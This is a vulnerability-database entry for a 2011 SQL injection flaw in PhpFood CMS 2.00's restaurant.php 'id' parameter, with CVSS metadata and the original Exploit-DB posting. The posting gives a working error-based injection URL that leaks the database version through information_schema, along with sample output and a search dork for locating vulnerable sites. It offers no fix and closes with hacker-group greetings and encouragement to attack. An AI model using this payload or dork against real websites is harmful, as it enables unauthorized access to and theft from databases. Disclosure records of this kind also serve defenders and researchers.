PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability

vendor:

phpfood_cms

by:

kaMtiEz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpfood_cms

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:phpfood:phpfood_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability

PhpFood CMS is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerable parameter is 'id' which is passed to the 'restaurant.php' script. An attacker can inject malicious SQL queries in the 'id' parameter to gain access to sensitive information stored in the database.

Mitigation:

The vendor has not released any patch to address this vulnerability. As a workaround, it is recommended to restrict access to the vulnerable script.

Source

Exploit-DB raw data:

#############################################################################################################
## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability			                           ##
## Author : kaMtiEz (kamtiez@exploit-id.com)								   ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id	   ##
## Date : 3 July, 2011 						                                           ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.phpfood.com/
[+] Download : http://www.phpfood.com/download.html
[+] version : 2.00 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1


[ See It ]

Duplicate entry '5.0.91-community1' for key 1 :D

[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ] 

[+] Stop Dreaming , Lets Do it ! 
[+] Jangan Takut , Luka Pasti Akan Sembuh :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..